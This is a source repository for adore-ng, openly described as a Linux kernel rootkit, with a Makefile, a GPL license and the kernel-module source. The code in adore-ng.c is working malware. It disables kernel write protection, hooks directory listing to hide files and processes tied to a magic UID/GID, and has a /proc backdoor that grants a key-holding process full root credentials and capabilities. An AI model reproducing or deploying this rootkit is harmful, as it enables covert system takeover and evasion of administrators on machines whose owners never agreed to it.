├── .gitignore
├── LICENSE
├── Makefile
├── README.md
├── adore-ng.c
├── adore-ng.h
├── ava.c
├── libinvisible.c
└── libinvisible.h
/.gitignore:
--------------------------------------------------------------------------------
1 | # Object files
2 | *.o
3 | *.ko
4 | *.obj
5 | *.elf
6 |
7 | # Precompiled Headers
8 | *.gch
9 | *.pch
10 |
11 | # Libraries
12 | *.lib
13 | *.a
14 | *.la
15 | *.lo
16 |
17 | # Shared objects (inc. Windows DLLs)
18 | *.dll
19 | *.so
20 | *.so.*
21 | *.dylib
22 |
23 | # Executables
24 | *.exe
25 | *.out
26 | *.app
27 | *.i*86
28 | *.x86_64
29 | *.hex
30 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 2, June 1991
3 |
4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
6 | Everyone is permitted to copy and distribute verbatim copies
7 | of this license document, but changing it is not allowed.
8 |
9 | Preamble
10 |
11 | The licenses for most software are designed to take away your
12 | freedom to share and change it. By contrast, the GNU General Public
13 | License is intended to guarantee your freedom to share and change free
14 | software--to make sure the software is free for all its users. This
15 | General Public License applies to most of the Free Software
16 | Foundation's software and to any other program whose authors commit to
17 | using it. (Some other Free Software Foundation software is covered by
18 | the GNU Lesser General Public License instead.) You can apply it to
19 | your programs, too.
20 |
21 | When we speak of free software, we are referring to freedom, not
22 | price. Our General Public Licenses are designed to make sure that you
23 | have the freedom to distribute copies of free software (and charge for
24 | this service if you wish), that you receive source code or can get it
25 | if you want it, that you can change the software or use pieces of it
26 | in new free programs; and that you know you can do these things.
27 |
28 | To protect your rights, we need to make restrictions that forbid
29 | anyone to deny you these rights or to ask you to surrender the rights.
30 | These restrictions translate to certain responsibilities for you if you
31 | distribute copies of the software, or if you modify it.
32 |
33 | For example, if you distribute copies of such a program, whether
34 | gratis or for a fee, you must give the recipients all the rights that
35 | you have. You must make sure that they, too, receive or can get the
36 | source code. And you must show them these terms so they know their
37 | rights.
38 |
39 | We protect your rights with two steps: (1) copyright the software, and
40 | (2) offer you this license which gives you legal permission to copy,
41 | distribute and/or modify the software.
42 |
43 | Also, for each author's protection and ours, we want to make certain
44 | that everyone understands that there is no warranty for this free
45 | software. If the software is modified by someone else and passed on, we
46 | want its recipients to know that what they have is not the original, so
47 | that any problems introduced by others will not reflect on the original
48 | authors' reputations.
49 |
50 | Finally, any free program is threatened constantly by software
51 | patents. We wish to avoid the danger that redistributors of a free
52 | program will individually obtain patent licenses, in effect making the
53 | program proprietary. To prevent this, we have made it clear that any
54 | patent must be licensed for everyone's free use or not licensed at all.
55 |
56 | The precise terms and conditions for copying, distribution and
57 | modification follow.
58 |
59 | GNU GENERAL PUBLIC LICENSE
60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
61 |
62 | 0. This License applies to any program or other work which contains
63 | a notice placed by the copyright holder saying it may be distributed
64 | under the terms of this General Public License. The "Program", below,
65 | refers to any such program or work, and a "work based on the Program"
66 | means either the Program or any derivative work under copyright law:
67 | that is to say, a work containing the Program or a portion of it,
68 | either verbatim or with modifications and/or translated into another
69 | language. (Hereinafter, translation is included without limitation in
70 | the term "modification".) Each licensee is addressed as "you".
71 |
72 | Activities other than copying, distribution and modification are not
73 | covered by this License; they are outside its scope. The act of
74 | running the Program is not restricted, and the output from the Program
75 | is covered only if its contents constitute a work based on the
76 | Program (independent of having been made by running the Program).
77 | Whether that is true depends on what the Program does.
78 |
79 | 1. You may copy and distribute verbatim copies of the Program's
80 | source code as you receive it, in any medium, provided that you
81 | conspicuously and appropriately publish on each copy an appropriate
82 | copyright notice and disclaimer of warranty; keep intact all the
83 | notices that refer to this License and to the absence of any warranty;
84 | and give any other recipients of the Program a copy of this License
85 | along with the Program.
86 |
87 | You may charge a fee for the physical act of transferring a copy, and
88 | you may at your option offer warranty protection in exchange for a fee.
89 |
90 | 2. You may modify your copy or copies of the Program or any portion
91 | of it, thus forming a work based on the Program, and copy and
92 | distribute such modifications or work under the terms of Section 1
93 | above, provided that you also meet all of these conditions:
94 |
95 | a) You must cause the modified files to carry prominent notices
96 | stating that you changed the files and the date of any change.
97 |
98 | b) You must cause any work that you distribute or publish, that in
99 | whole or in part contains or is derived from the Program or any
100 | part thereof, to be licensed as a whole at no charge to all third
101 | parties under the terms of this License.
102 |
103 | c) If the modified program normally reads commands interactively
104 | when run, you must cause it, when started running for such
105 | interactive use in the most ordinary way, to print or display an
106 | announcement including an appropriate copyright notice and a
107 | notice that there is no warranty (or else, saying that you provide
108 | a warranty) and that users may redistribute the program under
109 | these conditions, and telling the user how to view a copy of this
110 | License. (Exception: if the Program itself is interactive but
111 | does not normally print such an announcement, your work based on
112 | the Program is not required to print an announcement.)
113 |
114 | These requirements apply to the modified work as a whole. If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works. But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 |
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 |
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 |
134 | 3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 |
138 | a) Accompany it with the complete corresponding machine-readable
139 | source code, which must be distributed under the terms of Sections
140 | 1 and 2 above on a medium customarily used for software interchange; or,
141 |
142 | b) Accompany it with a written offer, valid for at least three
143 | years, to give any third party, for a charge no more than your
144 | cost of physically performing source distribution, a complete
145 | machine-readable copy of the corresponding source code, to be
146 | distributed under the terms of Sections 1 and 2 above on a medium
147 | customarily used for software interchange; or,
148 |
149 | c) Accompany it with the information you received as to the offer
150 | to distribute corresponding source code. (This alternative is
151 | allowed only for noncommercial distribution and only if you
152 | received the program in object code or executable form with such
153 | an offer, in accord with Subsection b above.)
154 |
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it. For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable. However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 |
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 |
172 | 4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License. Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 |
180 | 5. You are not required to accept this License, since you have not
181 | signed it. However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works. These actions are
183 | prohibited by law if you do not accept this License. Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 |
189 | 6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions. You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 |
197 | 7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License. If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all. For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 |
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 |
215 | It is not the purpose of this section to induce you to infringe any
216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices. Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 |
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 |
229 | 8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded. In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 |
237 | 9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time. Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 |
242 | Each version is given a distinguishing version number. If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation. If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 |
250 | 10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission. For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this. Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 |
258 | NO WARRANTY
259 |
260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 |
270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 |
280 | END OF TERMS AND CONDITIONS
281 |
282 | How to Apply These Terms to Your New Programs
283 |
284 | If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 |
288 | To do so, attach the following notices to the program. It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 |
293 | {description}
294 | Copyright (C) {year} {fullname}
295 |
296 | This program is free software; you can redistribute it and/or modify
297 | it under the terms of the GNU General Public License as published by
298 | the Free Software Foundation; either version 2 of the License, or
299 | (at your option) any later version.
300 |
301 | This program is distributed in the hope that it will be useful,
302 | but WITHOUT ANY WARRANTY; without even the implied warranty of
303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
304 | GNU General Public License for more details.
305 |
306 | You should have received a copy of the GNU General Public License along
307 | with this program; if not, write to the Free Software Foundation, Inc.,
308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 |
310 | Also add information on how to contact you by electronic and paper mail.
311 |
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 |
315 | Gnomovision version 69, Copyright (C) year name of author
316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 | This is free software, and you are welcome to redistribute it
318 | under certain conditions; type `show c' for details.
319 |
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License. Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 |
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary. Here is a sample; alter the names:
328 |
329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 |
332 | {signature of Ty Coon}, 1 April 1989
333 | Ty Coon, President of Vice
334 |
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs. If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library. If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 |
341 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | # New kbuild based Makefile for 2.6 kernel
2 | # Edit ELITE_UID etc. and copy to 'Makefile'
3 | # then type 'make'
4 |
5 | EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
6 | EXTRA_CFLAGS+=-DCURRENT_ADORE=56
7 | EXTRA_CFLAGS+=-DADORE_KEY=\"fgjgggfd\"
8 |
9 | #EXTRA_CFLAGS+=-DHIDE
10 |
11 | # Enable this so it expects itself to be relinked into another LKM with
12 | # 'relink26' script. If compiled with this switch, it cant
13 | # be loaded stand alone.
14 | #EXTRA_CFLAGS+=-DRELINKED
15 |
16 | #EXTRA_CFLAGS+=-D__SMP__ # enable this for SMP systems
17 |
18 | # comment this out if your dmesg tells you that the version
19 | # magic strings from adore-ng differ from your kernel one's
20 | # you need to change the adore-ng-2.6.c file VERSION_MAGIC
21 | # at the end of the file to match your version
22 | #EXTRA_CFLAGS+=-DCROSS_BUILD
23 |
24 | EXTRA_CFLAGS+=-DMODIFY_PAGE_TABLES
25 | EXTRA_CFLAGS+=-DFOUR_LEVEL_PAGING
26 |
27 |
28 | #KERNEL_SOURCE=/usr/src/linux
29 | KERNELBUILD := /lib/modules/$(shell uname -r)/build
30 |
31 | obj-m += adore-ng.o
32 |
33 | default: ava adore
34 |
35 | adore:
36 | make -C $(KERNELBUILD) M=$(shell pwd) modules
37 |
38 | ava: ava.c libinvisible.c
39 | $(CC) $(EXTRA_CFLAGS) ava.c libinvisible.c -o ava
40 |
41 | clean:
42 | rm -f core ava *.ko *.o
43 | rm -f *mod* Module*
44 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | adore-ng
2 | ========
3 |
4 | linux rootkit adapted for 2.6 and 3.x
5 |
--------------------------------------------------------------------------------
/adore-ng.c:
--------------------------------------------------------------------------------
1 | /*** (C) 2004-2005 by Stealth
2 | *** http://stealth.scorpions.net/rootkits
3 | *** http://stealth.openwall.net/rootkits
4 | ***
5 | *** 2008 wzt -- Fix gcc complier warnnings.
6 | ***
7 | *** http://www.xsec.org
8 | ***
9 | *** (C)'ed Under a BSDish license. Please look at LICENSE-file.
10 | *** SO YOU USE THIS AT YOUR OWN RISK!
11 | *** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS.
12 | *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
13 | ***
14 | *** -> Use ava to get all the things workin'.
15 | ***
16 | ***/
17 | #ifndef __KERNEL__
18 | #define __KERNEL__
19 | #endif
20 | #ifndef MODULE
21 | #define MODULE
22 | #endif
23 |
24 | #define LINUX26
25 |
26 | #ifdef MODVERSIONS
27 | #include
28 | #endif
29 |
30 | #include
31 | #include
32 | #include
33 | #include
34 | #include
35 | #include
36 | #include
37 | #include
38 | #include
39 | #include
40 | #include
41 | #include
42 | #include
43 | #include
44 | #include
45 |
46 | #include
47 | #include
48 | #include
49 | #include
50 | #include
51 | #include
52 | #include
53 | #include
54 |
55 | #include "adore-ng.h"
56 |
57 | #ifdef __x86_64__
58 | uint64_t orig_cr0;
59 | uint64_t clear_return_cr0(void)
60 | {
61 | uint64_t cr0 = 0;
62 | uint64_t ret;
63 | asm volatile ("mov %%cr0, %%rax"
64 | :"=a"(cr0)
65 | );
66 | ret = cr0;
67 | cr0 &= 0xfffeffff;
68 | asm volatile ("mov %%rax, %%cr0"
69 | :
70 | :"a"(cr0)
71 | );
72 | return ret;
73 | }
74 | void setback_cr0(uint64_t val)
75 | {
76 | asm volatile ("mov %%rax, %%cr0"
77 | :
78 | :"a"(val)
79 | );
80 | }
81 | #else
82 | unsigned orig_cr0;
83 | /*清除cr0寄存器的写保护位,第16位为WP写保护位*/
84 | unsigned clear_return_cr0(void)
85 | {
86 | unsigned cr0 = 0;
87 | unsigned ret;
88 | asm volatile ("movl %%cr0, %%eax"
89 | :"=a"(cr0)
90 | );
91 | ret = cr0;
92 | cr0 &= 0xfffeffff;
93 | asm volatile ("movl %%eax, %%cr0"
94 | :
95 | :"a"(cr0)
96 | );
97 | return ret;
98 | }
99 | /*用orig_cr0恢复cr0寄存器*/
100 | void setback_cr0(unsigned val)
101 | {
102 | asm volatile ("movl %%eax, %%cr0"
103 | :
104 | :"a"(val)
105 | );
106 | }
107 | #endif
108 |
109 | char *proc_fs = "/proc"; /* default proc FS to hide processes */
110 | char *root_fs = "/"; /* default FS to hide files */
111 | char *opt_fs = NULL;
112 |
113 | typedef int (*readdir_t)(struct file *, void *, filldir_t);
114 | readdir_t orig_root_readdir = NULL, orig_opt_readdir = NULL;
115 | readdir_t orig_proc_readdir = NULL;
116 |
117 | #if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 11, 0))
118 | typedef int (*iterate_dir_t)(struct file *, struct dir_context *);
119 | iterate_dir_t orig_root_iterate = NULL;
120 | iterate_dir_t orig_opt_iterate = NULL;
121 | iterate_dir_t orig_proc_iterate = NULL;
122 | #endif
123 |
124 | struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *,
125 | struct nameidata *) = NULL;
126 |
127 | #ifndef PID_MAX
128 | #define PID_MAX 0x8000
129 | #endif
130 |
131 | static char hidden_procs[PID_MAX/8+1];
132 |
133 | inline void hide_proc(pid_t x)
134 | {
135 | if (x >= PID_MAX || x == 1)
136 | return;
137 | hidden_procs[x/8] |= 1<<(x%8);
138 | }
139 |
140 | inline void unhide_proc(pid_t x)
141 | {
142 | if (x >= PID_MAX)
143 | return;
144 | hidden_procs[x/8] &= ~(1<<(x%8));
145 | }
146 |
147 | inline char is_invisible(pid_t x)
148 | {
149 | if (x >= PID_MAX)
150 | return 0;
151 | return hidden_procs[x/8]&(1<<(x%8));
152 | }
153 |
154 | /* Theres some crap after the PID-filename on proc
155 | * getdents() so the semantics of this function changed:
156 | * Make "672" -> 672 and
157 | * "672|@\" -> 672 too
158 | */
159 | int adore_atoi(const char *str)
160 | {
161 | int ret = 0, mul = 1;
162 | const char *ptr;
163 |
164 | for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++)
165 | ;
166 | ptr--;
167 | while (ptr >= str) {
168 | if (*ptr < '0' || *ptr > '9')
169 | break;
170 | ret += (*ptr - '0') * mul;
171 | mul *= 10;
172 | ptr--;
173 | }
174 | return ret;
175 | }
176 |
177 | /* Own implementation of find_task_by_pid() */
178 | struct task_struct *adore_find_task(pid_t pid)
179 | {
180 | struct task_struct *p;
181 |
182 | //read_lock(&tasklist_lock);
183 | for_each_task(p) {
184 | if (p->pid == pid) {
185 | // read_unlock(&tasklist_lock);
186 | return p;
187 | }
188 | }
189 | //read_unlock(&tasklist_lock);
190 | return NULL;
191 | }
192 |
193 | int should_be_hidden(pid_t pid)
194 | {
195 | struct task_struct *p = NULL;
196 |
197 | if (is_invisible(pid)) {
198 | return 1;
199 | }
200 |
201 | p = adore_find_task(pid);
202 | if (!p)
203 | return 0;
204 |
205 | /* If the parent is hidden, we are hidden too XXX */
206 | task_lock(p);
207 |
208 | if (is_invisible(p->parent->pid)) {
209 | task_unlock(p);
210 | hide_proc(pid);
211 | return 1;
212 | }
213 |
214 | task_unlock(p);
215 | return 0;
216 | }
217 | #ifndef cap_set_full
218 | #ifndef CAP_FULL_SET
219 | # define CAP_FULL_SET ((kernel_cap_t){{ ~0, ~0 }})
220 | #endif
221 | #ifndef cap_set_full
222 | # define cap_set_full(c) do { (c) = ((kernel_cap_t){{ ~0, ~0 }}); } while (0)
223 | #endif
224 | #endif
225 |
226 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 9, 0))
227 | #define PATCH_UID
228 | #else
229 | #define PATCH_UID .val
230 | #endif
231 |
232 | /* You can control adore-ng without ava too:
233 | *
234 | * echo > /proc/ will make the shell authenticated,
235 | * echo > /proc/-fullprivs will give UID 0,
236 | * cat /proc/hide- from such a shell will hide PID,
237 | * cat /proc/unhide- will unhide the process
238 | */
239 | struct dentry *adore_lookup(struct inode *i, struct dentry *d,
240 | struct nameidata *nd)
241 | {
242 | struct cred *edit_cred = (struct cred *)current->cred;
243 | task_lock(current);
244 |
245 | if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) {
246 | current->flags |= PF_AUTH;
247 | edit_cred->suid PATCH_UID = ADORE_VERSION;
248 | } else if ((current->flags & PF_AUTH) &&
249 | strncmp(d->d_iname, "fullprivs", 9) == 0) {
250 | edit_cred->uid PATCH_UID = 0;
251 | edit_cred->suid PATCH_UID = 0;
252 | edit_cred->euid PATCH_UID = 0;
253 | edit_cred->gid PATCH_UID = 0;
254 | edit_cred->egid PATCH_UID = 0;
255 | edit_cred->fsuid PATCH_UID = 0;
256 | edit_cred->fsgid PATCH_UID = 0;
257 |
258 | cap_set_full(edit_cred->cap_effective);
259 | cap_set_full(edit_cred->cap_inheritable);
260 | cap_set_full(edit_cred->cap_permitted);
261 | } else if ((current->flags & PF_AUTH) &&
262 | strncmp(d->d_iname, "hide-", 5) == 0) {
263 | hide_proc(adore_atoi(d->d_iname+5));
264 | } else if ((current->flags & PF_AUTH) &&
265 | strncmp(d->d_iname, "unhide-", 7) == 0) {
266 | unhide_proc(adore_atoi(d->d_iname+7));
267 | } else if ((current->flags & PF_AUTH) &&
268 | strncmp(d->d_iname, "uninstall", 9) == 0) {
269 | cleanup_module();
270 | }
271 |
272 | task_unlock(current);
273 |
274 | if (should_be_hidden(adore_atoi(d->d_iname)) &&
275 | /* A hidden ps must be able to see itself! */
276 | !should_be_hidden(current->pid))
277 | return NULL;
278 |
279 | return orig_proc_lookup(i, d, nd);
280 | }
281 |
282 | filldir_t proc_filldir = NULL;
283 | DEFINE_SPINLOCK(proc_filldir_lock);
284 |
285 | int adore_proc_filldir(void *buf, const char *name, int nlen, loff_t off, u64 ino, unsigned x)
286 | {
287 | char abuf[128];
288 |
289 | memset(abuf, 0, sizeof(abuf));
290 | memcpy(abuf, name, nlen < sizeof(abuf) ? nlen : sizeof(abuf) - 1);
291 |
292 | if (should_be_hidden(adore_atoi(abuf)))
293 | return 0;
294 |
295 | if (proc_filldir)
296 | return proc_filldir(buf, name, nlen, off, ino, x);
297 | return 0;
298 | }
299 |
300 | int adore_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
301 | {
302 | int r = 0;
303 |
304 | spin_lock(&proc_filldir_lock);
305 | proc_filldir = filldir;
306 | r = orig_proc_readdir(fp, buf, adore_proc_filldir);
307 | spin_unlock(&proc_filldir_lock);
308 | return r;
309 | }
310 |
311 |
312 | filldir_t opt_filldir = NULL;
313 | struct dentry *parent_opt_dir[1024];
314 |
315 | int adore_opt_filldir(void *buf, const char *name, int nlen, loff_t off, u64 ino, unsigned x)
316 | {
317 | struct inode *inode = NULL;
318 | struct dentry *dentry = NULL;
319 | struct qstr this;
320 | struct dentry *dir = parent_opt_dir[current->pid % 1024];
321 | int r = 0;
322 | uid_t uid;
323 | gid_t gid;
324 |
325 | if (!dir)
326 | return 0;
327 | this.name = name;
328 | this.len = nlen;
329 | this.hash = full_name_hash(this.name, this.len);
330 | dentry = d_lookup(dir, &this);
331 | if (!dentry) {
332 | dentry = d_alloc(dir, &this);
333 | if (!dentry) {
334 | return 0;
335 | }
336 | if (!dir->d_inode->i_op->lookup)
337 | return 0;
338 | if(dir->d_inode->i_op->lookup(dir->d_inode, dentry, NULL) != 0) {
339 | return 0;
340 | }
341 | }
342 | if(!(inode = dentry->d_inode))
343 | return 0;
344 |
345 | uid = inode->i_uid PATCH_UID ;
346 | gid = inode->i_gid PATCH_UID;
347 |
348 | iput(inode);
349 | dput(dentry);
350 | /*
351 | if (reiser) {
352 | if (inode->i_state & I_NEW)
353 | unlock_new_inode(inode);
354 | }
355 |
356 | iput(inode);
357 | */
358 | /* Is it hidden ? */
359 | if (uid == ELITE_UID && gid == ELITE_GID) {
360 | r = 0;
361 | } else if (opt_filldir)
362 | r = opt_filldir(buf, name, nlen, off, ino, x);
363 |
364 | return r;
365 | }
366 |
367 |
368 | int adore_opt_readdir(struct file *fp, void *buf, filldir_t filldir)
369 | {
370 | int r = 0;
371 |
372 | if (!fp || !fp->f_dentry || !buf || !filldir || !orig_root_readdir)
373 | return 0;
374 |
375 | opt_filldir = filldir;
376 | parent_opt_dir[current->pid % 1024] = fp->f_dentry;
377 | r = orig_opt_readdir(fp, buf, adore_opt_filldir);
378 |
379 | return r;
380 | }
381 |
382 |
383 |
384 | /* About the locking of these global vars:
385 | * I used to lock these via rwlocks but on SMP systems this can cause
386 | * a deadlock because the iget() locks an inode itself and I guess this
387 | * could cause a locking situation of AB BA. So, I do not lock root_sb and
388 | * root_filldir (same with opt_) anymore. root_filldir should anyway always
389 | * be the same (filldir64 or filldir, depending on the libc). The worst thing
390 | * that could happen is that 2 processes call filldir where the 2nd is
391 | * replacing root_sb which affects the 1st process which AT WORST CASE shows
392 | * the hidden files.
393 | * Following conditions have to be met then: 1. SMP 2. 2 processes calling
394 | * getdents() on 2 different partitions with the same FS.
395 | * Now, since I made an array of super_blocks it must also be that the PIDs of
396 | * these procs have to be the same PID modulo 1024. This sitation (all 3 cases
397 | * must be met) should be very very rare.
398 | */
399 | filldir_t root_filldir = NULL;
400 | //struct super_block *root_sb[1024];
401 | struct dentry *parent_dir[1024];
402 |
403 | int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, u64 ino, unsigned x)
404 | {
405 | struct inode *inode = NULL;
406 | struct dentry *dentry = NULL;
407 | struct qstr this;
408 | struct dentry *dir = parent_dir[current->pid % 1024];
409 | int r = 0;
410 | uid_t uid;
411 | gid_t gid;
412 |
413 | if (!dir)
414 | return 0;
415 |
416 | /* Theres an odd 2.6 behaivior. iget() crashes on ReiserFS! using iget_locked
417 | * without the unlock_new_inode() doesnt crash, but deadlocks
418 | * time to time. So I basically emulate iget() without
419 | * the sb->s_op->read_inode(inode); and so it doesnt crash or deadlock.
420 | */
421 |
422 | if(strcmp(name, ".") == 0 || strcmp(name , "..") == 0)
423 | return root_filldir(buf, name, nlen, off, ino, x);
424 |
425 | /*下面的代码可以用这个代替,但是内核警告说最好不要用这个函数
426 | *struct dentry *lookup_one_len(const char *name, struct dentry *base, int len)
427 | */
428 | this.name = name;
429 | this.len = nlen;
430 | this.hash = full_name_hash(this.name, this.len);
431 | dentry = d_lookup(dir, &this);
432 | if (!dentry) {
433 | dentry = d_alloc(dir, &this);
434 | if (!dentry) {
435 | return 0;
436 | }
437 | if (!dir->d_inode->i_op->lookup)
438 | return 0;
439 | if(dir->d_inode->i_op->lookup(dir->d_inode, dentry, NULL) != 0) {
440 | printk("lookup failed\n");
441 | return 0;
442 | }
443 | }
444 | if(!(inode = dentry->d_inode)) {
445 | return 0;
446 | }
447 |
448 | uid = inode->i_uid PATCH_UID;
449 | gid = inode->i_gid PATCH_UID;
450 |
451 | //iput(inode);
452 | //dput(dentry);
453 |
454 | /* Is it hidden ? */
455 | if (uid == ELITE_UID && gid == ELITE_GID) {
456 | r = 0;
457 | } else if (root_filldir) {
458 | r = root_filldir(buf, name, nlen, off, ino, x);
459 | }
460 |
461 | return r;
462 | }
463 |
464 | int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)
465 | {
466 | int r = 0;
467 |
468 | if (!fp || !fp->f_dentry || !buf || !filldir || !orig_root_readdir)
469 | return 0;
470 |
471 | root_filldir = filldir;
472 | parent_dir[current->pid % 1024] = fp->f_dentry;
473 | r = orig_root_readdir(fp, buf, adore_root_filldir);
474 |
475 | return r;
476 | }
477 |
